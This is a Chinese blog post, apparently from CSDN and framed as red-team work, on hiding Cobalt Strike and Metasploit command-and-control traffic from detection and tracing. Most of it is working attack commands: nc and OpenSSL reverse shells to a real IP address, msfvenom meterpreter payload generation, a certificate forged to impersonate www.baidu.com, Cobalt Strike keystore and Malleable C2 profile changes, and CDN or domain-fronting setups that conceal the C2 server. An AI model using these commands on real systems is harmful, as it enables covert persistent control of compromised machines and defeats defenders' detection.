【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置

已于 2024-07-03 10:14:40 修改
阅读量1.8k 收藏 12
点赞数 1
分类专栏: # 红队APT 文章标签: ssl CDN 反溯源 rt
于 2023-04-18 16:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130191910
版权

文章目录

背景交代:

在红蓝对抗或日常测试中会出现一种情况,当我们终于让目标机器上线后,
却因为明显的通信特征被安全设备检测到从而失去目标机器的控制权限,
这时就需要对Cobalt Strike或MSF的特征进行隐藏、对其通信流量进行混淆。

常见红蓝对抗中红队面临问题:

1、通讯协议走TCP&UDP协议,直接被防火墙限制出网
2、通讯协议走无加密HTTP协议,直接明文传输成指纹特征
3、通讯协议走HTTPS或DNS加密协议,直接工具证书成指纹特征
4、通讯协议走HTTPS或DNS加密协议,特征指纹等修改后又被朔源拉黑

红队进行权限控制,主机开始限制出网,尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常,尝试修改工具指纹特征加密流量防止检测,结果被定位到控制服务器,再次使用CDN,云函数,第三方上线等进行隐藏保证权限维持。

蓝队发现处置情况:

1.蓝队-朔源后拉黑控制IP
2.蓝队-设备平台指纹告警
3.蓝队-流量分析异常告警

NC-未加密&加密后-流量抓包对比

nc -lvvp 5566
nc -e /bin/bash 47.94.130.42 5566

未进行流量加密之前:这里可以清晰地看到通过nc执行的相关系统命令,很容易被安全设备检测到
在这里插入图片描述

在我们的攻击端生成自签名证书(加ssl)

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

在这里插入图片描述

在攻击机上监听指定端口,这里我选择4455

openssl s_server -quiet -key key.pem -cert cert.pem -port 4455

在受害机上执行shell反弹命令(注意修改ip和端口)

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.94.130.42:4455 > /tmp/s;

在这里插入图片描述
这里可以看到,流量进行了加密,只能隐约的看到一些ssl证书信息。

MSF-流量通讯特征修改-证书-openssl

解决HTTPS-SSL通讯证书被特征标示问题

传统msf虽然使用https等加密方式,不过仍然会有特征(head头部固定)

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http LHOST=47.94.130.42  LPORT=4455 -f exe -o msf.exe

为了方便流量与其他协议作区分,这里我使用http协议;生成后在虚拟机中上线,不过遇到了奇怪的事情就是,我在上线的虚拟机中抓不到http流量的数据包,而在物理机中抓到了(emmm我也不太懂为什么会这样)
在这里插入图片描述
这里可以很明显的看到:固定的GET/POST乱码请求,以及固定的Firefox UA头,下方的post乱码数据是我做的命令交互

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=47.94.130.42  LPORT=4455 -f exe -o msf-https.exe

那么如果使用msf生成https协议的后门呢?
采用msf自带的证书进行上线(但是还是会被流量设备、IDS、IPS等设备检测(特征库))
在这里插入图片描述
这里可以看到msf自带的证书,这里我们对该证书进行伪装(这里其实流量上没做什么改变,知识对默认证书指纹做了修改)

1.利用openssl生成证书:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

2.MSF生成绑定证书后门:

msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.130.42 LPORT=4455 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o msf-https-cer.exe

3.MSF监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 5566
set HandlerSSLCert /root/www.baidu.com.pem
set StagerVerifySSLCert true
run

在这里插入图片描述

impersonate_ssl模块

此外Metasploit框架还有一个auxiliary/gather/impersonate_ssl模块,可以用来自动从信任源创建一个虚假证书,十分方便:

use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com
run

在这里插入图片描述

CS-流量通讯特征修改-证书指纹-keytool

-解决HTTP/S通讯证书及流量特征被特征标示问题
JDK Keytool 修改CS特征

1.修改默认端口:

编辑teamserver文件,更改server port默认端口50050

在这里插入图片描述
比如说我这里伪装成MongoDB数据库端口,同样连接服务端的时候密码也需要更改为27017
此外CS在运行的时候加载cobalstrike.store证书(默认配置)

2.去除store证书特征:

查看证书指纹:

keytool -list -v -keystore cobaltstrike.store	#keytool java jdk自带

在这里插入图片描述
这里可以很明显的看到很明显的cobaltstrike特征,于是我们在证书指纹方面对CS进行二次更改
生成自定义证书指纹:

keytool -keystore cobaltstrike1.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias whgojp.top -dname "CN=whgojp e-Szigno Root CA, OU=e-Szigno CA, O=whogjp Ltd., L=Budapest, S=HU, C=HU"

在这里插入图片描述
应用证书指纹:

keytool -importkeystore -srckeystore cobaltstrike1.store -destkeystore cobaltstrike1.store -deststoretype pkcs12

3、去除流量通讯特征:

背景:CS原始HTTP监听器心跳数据包
在这里插入图片描述
规则资源:
https://github.com/xx0hcd/Malleable-C2-Profiles
https://github.com/FortyNorthSecurity/C2concealer
在这里插入图片描述
重新生成后门文件进行上线抓取心跳包
在这里插入图片描述
成功修改心跳包特征

DIY Profiles文件

1.创建C2文件:xiaodi.Profiles
2.写入通讯规则: UA头&GET&POST&心跳&证书等
3.测试规则正常:./c2lint whgojp.prifile
4.加载C2规则启动:

./teamserver ip 密码 whgojp.Profiles

https-certificate {
  set CN      "whgojp e-Szigno Root CA";
  set O        "whogjp Ltd.";
  set C        "HU";
  set L        "Budapest";
  set OU      "e-Szigno CA";
  set ST      "HU";
  set validity "365";
}

#设置,修改成你的证书名称和证书密码

code-signer{
  set keystore "whgojp.store";
  set password "123456";
  set alias "whgojp.top";
}

伪造的证书与下方对应

keytool -keystore whgojp.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias whgojp.top -dname "CN=whgojp e-Szigno Root CA, OU=e-Szigno CA, O=whogjp Ltd., L=Budapest, S=HU, C=HU"

隐藏:
域前置、CDN、云函数,网盘第三方上线等

CS-防封锁处置IP地址-C2&CDN隐藏IP

解决HTTPS-SSL通讯被朔源IP封锁问题
配置:
https://mp.weixin.qq.com/s/MghFgegdp3l3tFE3hOvcYw
1、阿里云备案域名&全站加速CDN配置
在这里插入图片描述
尝试超级ping一下,配置成功
在这里插入图片描述
开了CDN之后,每超级ping一次都是人民币的声音emmm
2、CS创建监听器-HTTPS/Stager/Header
在这里插入图片描述
3、生成后门-进程网络状态&威胁情报平台
成功上线运行
在这里插入图片描述
使用火绒剑查看网络连接情况
在这里插入图片描述
很显然这里并不是我的真实IP 赶快把CDN服务关了,顶不住了

发挥想象:

域前置?转发器换成CDN;
云函数?转发器换成云函数转发;
代理隐藏?转发器换成代理机;
网关隐藏?转发器换成网关;

An0nymouer
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C2的几种常见的流量特征举例总结
Fiverya的博客
11-23 981
以下为几种常见的C2流量特征
青鸟影院_C#_187影院_trees4v_drovemrp_4455影院_
10-03
c# winform,简单的影院系统,查看放映列表、放映厅座次以及购票功能
MSF流量加密
最新发布
Welcome To Myon'Blog !
01-13 575
MSF中生成shell,并上线运行时。都是通过`http` `https` `tcp`等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
网络安全进阶篇之流量加密(十三章-3)CS生成ssl证书修改c2 profile 加密流量逃逸检测
划水的小白白
05-19 3436
文章目录零、为什么要对CS进行流量加密一、 生成免费的 ssl 证书二、 创建并修改 C2-profile 文件三、 检测 C2 profile 文件是否可用四、 配置 teamserver 文件运行上线五、 抓取流量 零、为什么要对CS进行流量加密 cobalt strike 是很多红队的首选的攻击神器,在 APT 方面近几年应用范围很广, 很多著名的团队都曾使用这个工具进行 APT,效果显著。 导致很多 ids 入侵检测工具和流量检测工具已经可以拦截和发现, 特别是流量方面,如果使用默认证书进行渗
MSF使用总结
qq_44657899的博客
09-25 4154
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
溯源制】CDN&前置&云函数-流量分析|溯源
今天是几号的博客
05-12 3365
1、不备案的名+禁用不必要的名解析记录(防止被溯源收集到更多信息)2、使用HTTPS通讯3、C2服务器混淆基础特征-修改profile配置文件,修改ssl证书4、CS服务端防火墙做策略,仅允许目标主机网段连接,防止其他网段主机对其进行扫描,防溯源5、加跳板、代理等,当然最重要的是免杀了……
如何建立企业内部的ATT&CK.pdf
09-13
例如,通过分析哥斯拉和冰蝎攻击事件,可以识别出如ReGeorg和Shiro序列化工具等攻击技术,制定相应的防御措施。 总之,ATT&CK为企业提供了一个强大的工具,帮助它们理解和应对网络威胁,通过建立和运营ATT&CK框架...
goby红队&社区版-win-64-2.4.7
11-27
"goby红队&社区版-win-64-2.4.7"这一标题揭示了我们正在讨论的是Goby的一个特定版本,适用于64位Windows操作系统,版本号为2.4.7,同时包含了红队和社区两个版本的功能。 Goby红队版是专门为安全测试和渗透测试设计...
ATT&CK.红队战术漫谈.pdf
09-09
ATT&CK.红队战术漫谈
原子红队:基于MITRE的ATT&CK的小型且高度便携式的检测测试
02-12
原子红队 原子红队允许每个安全团队通过执行简单的“原子测试”来测试其控件,这些“原子测试”使用与对手所使用的技术相同的技术(均映射到 )。 哲学 Atomic Red Team是一个简单测试库,每个安全团队都可以执行...
网络特征指纹库-用于CDN识别
05-05
常见CDN网络特征指纹库,使用Json加载
设计&原理&管理 - 安全技术资料汇总(共1份).zip
02-06
红蓝对抗、勒索软件以及APT(高级持续性威胁)攻击是当前网络安全领面临的严峻挑战。 1. 数据库系统设计:数据库系统的设计涉及到数据的组织、存储和访问方式。良好的设计能够保证数据的一致性、完整性和安全性。...
APT学习之红队基础概念
cike_y
05-31 522
高级持续性威胁 (APT) 是一种隐蔽的威胁行为者,通常是民族国家或国家支持的团体,它获得对计算机网络的未授权访问权,并且在很长一段时间内未被发现。
msf流量通讯特征修改
qq_52839196的博客
02-07 4447
msf流量通讯特征修改
C++内嵌汇编(一):汇编分析C++代码
chuanwang66的专栏
03-01 567
注:本文是“百度文库”中下载的文章^^谢谢作者   Sam: 使用binutils-2.23.1这个软件中的小工具objdump -d *.o 可以对一个目标文件进行汇编:) 了解汇编的一些小知识对于我们在开发软件时进行编程与调试大有好处,下面以 VS2008 环境下的 VC++ 简单介绍一下汇编的一些小东西! 1 、新建简单的 VC 控制台应用程序 A 、打开 Micr...
常见Webshell&重大漏洞的流量特征(附解密流量工具)
Python_0011的博客
11-10 5230
攻防演练中,经常会看到一些加密流量,又分不清楚是不是误报,本文总结了一些常见的流量特征,附流量解密工具。
红队溯源
5L2g556F5ZWl77yf
09-20 732
云函数自带CDN,每次请求webshell的时候ip都不同,利用云函数溯源 登录腾讯云,新建自定义云函数 贴上大佬的代码 # -*- coding: utf8 -*- import requests import json def geturl(urlstr): jurlstr = json.dumps(urlstr) dict_url = json.loads(jurlstr) return dict_url['u'] def main_handler(event, co
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 941
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
domain_fronting前置检测调研笔记
梦想闹钟
01-04 1009
domain_fronting前置检测调研笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值